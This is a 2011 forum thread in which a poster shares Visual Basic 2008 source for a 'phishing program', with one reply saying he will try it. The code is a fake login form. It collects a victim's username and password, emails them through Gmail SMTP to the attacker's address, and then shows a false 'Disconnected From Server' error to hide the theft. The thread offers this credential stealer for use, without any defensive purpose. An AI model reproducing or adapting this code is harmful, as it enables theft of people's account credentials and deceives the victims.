FUZE GFX
Would you like to react to this message? Create an account in a few clicks or log in to continue.

HowTo Make A Phishing Program in Microsoft Visual Basic 2008

2 posters

Go down

 HowTo Make A Phishing Program in Microsoft Visual Basic 2008 Empty HowTo Make A Phishing Program in Microsoft Visual Basic 2008

Post  iknowitsme Fri Jul 15, 2011 1:53 pm

Video on making a basic phishing program in Microsoft Visual Basic 2008 Express Edition.





the phish code :
Code:



Imports System.Net.Mail

If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("DIsconnected From Server, Please try again later!")
iknowitsme
iknowitsme
Admin
Admin

Posts : 13
Reputation : 4
Join date : 2011-07-14
Age : 29
Location : Australia

Back to top Go down

 HowTo Make A Phishing Program in Microsoft Visual Basic 2008 Empty Re: HowTo Make A Phishing Program in Microsoft Visual Basic 2008

Post  killway1 Thu Jul 21, 2011 4:52 am

this is cool ill give it a try

killway1

Posts : 2
Reputation : 1
Join date : 2011-07-16

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum